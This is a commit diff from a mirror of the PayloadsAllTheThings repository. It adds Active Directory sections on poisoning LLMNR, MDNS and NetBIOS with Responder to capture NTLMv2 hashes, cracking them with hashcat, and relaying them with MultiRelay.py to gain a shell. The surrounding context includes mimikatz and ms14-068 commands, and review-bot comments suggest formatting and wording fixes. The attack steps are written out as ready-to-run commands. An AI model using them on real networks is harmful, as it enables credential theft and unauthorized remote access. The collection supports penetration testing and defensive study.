mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
NTLMv2 hash capturing, cracking, replaying
This commit is contained in:
parent
d5478d1fd6
commit
d57d59eca7
@ -15,6 +15,8 @@
|
|||||||
* [Kerberoast](#kerberoast)
|
* [Kerberoast](#kerberoast)
|
||||||
* [Pass-the-Hash](#pass-the-hash)
|
* [Pass-the-Hash](#pass-the-hash)
|
||||||
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||||
|
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
||||||
|
* [NTLMv2 hashes relaying](#ntlv2-hashes-relaying)
|
||||||
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
* [Trust relationship between domains](#trust-relationship-between-domains)
|
* [Trust relationship between domains](#trust-relationship-between-domains)
|
||||||
* [Privilege Escalation](#privilege-escalation)
|
* [Privilege Escalation](#privilege-escalation)
|
||||||
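Review bot: the new table-of-contents entry `* [NTLMv2 hashes relaying](#ntlv2-hashes-relaying)` has a typo in its anchor; the heading added later in this commit is `## NTLMv2 hashes relaying`, which renders as `#ntlmv2-hashes-relaying`, so the link as written points nowhere. Change the anchor to `#ntlmv2-hashes-relaying`. The other new entry, `#capturing-and-cracking-ntlmv2-hashes`, matches its heading.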
@ -80,7 +82,7 @@ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-
|
|||||||
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||||
```
|
```
|
||||||
|
|
||||||
## Open Shares
|
### Open Shares
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
smbmap -H 10.10.10.100 # null session
|
smbmap -H 10.10.10.100 # null session
|
||||||
@ -408,6 +410,29 @@ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
|
|||||||
klist
|
klist
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Capturing and cracking NTLMv2 hashes
|
||||||
|
|
||||||
|
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
|
||||||
|
|
||||||
|
```python
|
||||||
|
python Responder.py -I eth0
|
||||||
|
```
|
||||||
|
|
||||||
|
Then crack the hash with `hashcat`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
hashcat -m 5600 -a 0 hash.txt crackstation.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
## NTLMv2 hashes relaying
|
||||||
|
|
||||||
|
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
|
||||||
|
|
||||||
|
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
|
||||||
|
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
|
||||||
|
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
|
||||||
|
4. Wait for a shell
|
||||||
|
|
||||||
### Dangerous Built-in Groups Usage
|
### Dangerous Built-in Groups Usage
|
||||||
|
|
||||||
AdminSDHolder
|
AdminSDHolder
|
||||||
|
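Review bot: the two new sections use `##` headings while the neighbouring sections in this file are `###` (this same commit demotes `## Open Shares` to `### Open Shares`, and `### Dangerous Built-in Groups Usage` follows directly), so `## Capturing and cracking NTLMv2 hashes` and `## NTLMv2 hashes relaying` should be `###` for consistency. The first code block is fenced as ```python although `python Responder.py -I eth0` is a shell command line, not Python source; use the same fence as the rest of the file (```powershell is what the surrounding blocks use, e.g. the `smbmap` block). Two wording fixes in the added prose: "tries to access a machine and mistype the IP" should read "mistypes", and "detect machine with `SMB signing`:`disabled`" should read "detect machines with SMB signing disabled". Finally, the value captured by Responder and cracked with `hashcat -m 5600` is a NetNTLMv2 challenge-response, not an NT hash; a short clarifying sentence would help readers who expect a Pass-the-Hash-style reuse of the captured value, which this section does not describe.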